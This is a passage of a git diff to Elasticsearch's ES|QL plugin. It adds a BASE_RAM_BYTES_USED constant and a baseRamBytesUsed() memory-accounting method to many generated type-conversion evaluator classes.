@@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(i); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += i.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromStringEvaluator.java index 96264da153be2..bd40ad246dd7f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromStringEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToLongFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToLongFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public ToLongFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -117,6 +120,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromUnsignedLongEvaluator.java index 51fec7b143d34..22bde8237da01 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToLongFromUnsignedLongEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToLongFromUnsignedLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToLongFromUnsignedLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator ul; public ToLongFromUnsignedLongEvaluator(Source source, EvalOperator.ExpressionEvaluator ul, @@ -113,6 +116,13 @@ public void close() { Releasables.closeExpectNoException(ul); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += ul.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToRadiansEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToRadiansEvaluator.java index 77dcc52f9f6e6..fd7d6b446f220 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToRadiansEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToRadiansEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -20,6 +21,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToRadiansEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToRadiansEvaluator.class); + private final EvalOperator.ExpressionEvaluator deg; public ToRadiansEvaluator(Source source, EvalOperator.ExpressionEvaluator deg, @@ -98,6 +101,13 @@ public void close() { Releasables.closeExpectNoException(deg); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += deg.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromBooleanEvaluator.java index 3a056a59218ce..37f34626c8989 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromBooleanEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToStringFromBooleanEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromBooleanEvaluator.class); + private final EvalOperator.ExpressionEvaluator bool; public ToStringFromBooleanEvaluator(Source source, EvalOperator.ExpressionEvaluator bool, @@ -100,6 +103,13 @@ public void close() { Releasables.closeExpectNoException(bool); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += bool.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromCartesianPointEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromCartesianPointEvaluator.java index b7eb970c4bdba..748b7168449d9 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromCartesianPointEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromCartesianPointEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToStringFromCartesianPointEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromCartesianPointEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public ToStringFromCartesianPointEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -120,6 +123,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromCartesianShapeEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromCartesianShapeEvaluator.java index 2c0523c9b27b3..b93a4b0178f11 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromCartesianShapeEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromCartesianShapeEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToStringFromCartesianShapeEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromCartesianShapeEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public ToStringFromCartesianShapeEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -120,6 +123,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDateNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDateNanosEvaluator.java index 22d596d5b19ae..521968dbd1855 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDateNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDateNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.LongBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToStringFromDateNanosEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromDateNanosEvaluator.class); + private final EvalOperator.ExpressionEvaluator datetime; public ToStringFromDateNanosEvaluator(Source source, EvalOperator.ExpressionEvaluator datetime, @@ -100,6 +103,13 @@ public void close() { Releasables.closeExpectNoException(datetime); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += datetime.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDatetimeEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDatetimeEvaluator.java index 0422df62556f8..0e6c7aae086dc 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDatetimeEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDatetimeEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.LongBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToStringFromDatetimeEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromDatetimeEvaluator.class); + private final EvalOperator.ExpressionEvaluator datetime; public ToStringFromDatetimeEvaluator(Source source, EvalOperator.ExpressionEvaluator datetime, @@ -100,6 +103,13 @@ public void close() { Releasables.closeExpectNoException(datetime); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += datetime.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDoubleEvaluator.java index 16b57b2ae740b..c48469420274d 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDoubleEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.DoubleBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToStringFromDoubleEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromDoubleEvaluator.class); + private final EvalOperator.ExpressionEvaluator dbl; public ToStringFromDoubleEvaluator(Source source, EvalOperator.ExpressionEvaluator dbl, @@ -100,6 +103,13 @@ public void close() { Releasables.closeExpectNoException(dbl); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += dbl.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromGeoPointEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromGeoPointEvaluator.java index 48357b75b6c98..ab4ece6ff57ba 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromGeoPointEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromGeoPointEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToStringFromGeoPointEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromGeoPointEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public ToStringFromGeoPointEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -120,6 +123,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromGeoShapeEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromGeoShapeEvaluator.java index 67aa3596b82ba..c108ac5dd71a0 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromGeoShapeEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromGeoShapeEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToStringFromGeoShapeEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromGeoShapeEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public ToStringFromGeoShapeEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -120,6 +123,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromIPEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromIPEvaluator.java index d3146ed7e845b..55aacc48dfa04 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromIPEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromIPEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToStringFromIPEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromIPEvaluator.class); + private final EvalOperator.ExpressionEvaluator ip; public ToStringFromIPEvaluator(Source source, EvalOperator.ExpressionEvaluator ip, @@ -120,6 +123,13 @@ public void close() { Releasables.closeExpectNoException(ip); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += ip.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromIntEvaluator.java index d8da5f73078cf..d017663f4dac8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromIntEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.IntBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToStringFromIntEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromIntEvaluator.class); + private final EvalOperator.ExpressionEvaluator integer; public ToStringFromIntEvaluator(Source source, EvalOperator.ExpressionEvaluator integer, @@ -100,6 +103,13 @@ public void close() { Releasables.closeExpectNoException(integer); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += integer.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromLongEvaluator.java index 5d8eec190fb23..c0a3ff9a8701a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.LongBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToStringFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator lng; public ToStringFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator lng, @@ -100,6 +103,13 @@ public void close() { Releasables.closeExpectNoException(lng); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lng.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromUnsignedLongEvaluator.java index c3430e22eb64d..420a78af987f6 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromUnsignedLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.LongBlock; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToStringFromUnsignedLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromUnsignedLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator lng; public ToStringFromUnsignedLongEvaluator(Source source, EvalOperator.ExpressionEvaluator lng, @@ -100,6 +103,13 @@ public void close() { Releasables.closeExpectNoException(lng); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lng.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromVersionEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromVersionEvaluator.java index 30dbc6d2d9dc8..105209d11bae7 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromVersionEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromVersionEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToStringFromVersionEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromVersionEvaluator.class); + private final EvalOperator.ExpressionEvaluator version; public ToStringFromVersionEvaluator(Source source, EvalOperator.ExpressionEvaluator version, @@ -120,6 +123,13 @@ public void close() { Releasables.closeExpectNoException(version); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += version.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromBooleanEvaluator.java index 06fa5184688a5..b36c366f2500c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromBooleanEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -21,6 +22,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToUnsignedLongFromBooleanEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToUnsignedLongFromBooleanEvaluator.class); + private final EvalOperator.ExpressionEvaluator bool; public ToUnsignedLongFromBooleanEvaluator(Source source, EvalOperator.ExpressionEvaluator bool, @@ -99,6 +102,13 @@ public void close() { Releasables.closeExpectNoException(bool); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += bool.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromDoubleEvaluator.java index 9593866d2c844..8899617111108 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromDoubleEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToUnsignedLongFromDoubleEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToUnsignedLongFromDoubleEvaluator.class); + private final EvalOperator.ExpressionEvaluator dbl; public ToUnsignedLongFromDoubleEvaluator(Source source, EvalOperator.ExpressionEvaluator dbl, @@ -114,6 +117,13 @@ public void close() { Releasables.closeExpectNoException(dbl); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += dbl.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromIntEvaluator.java 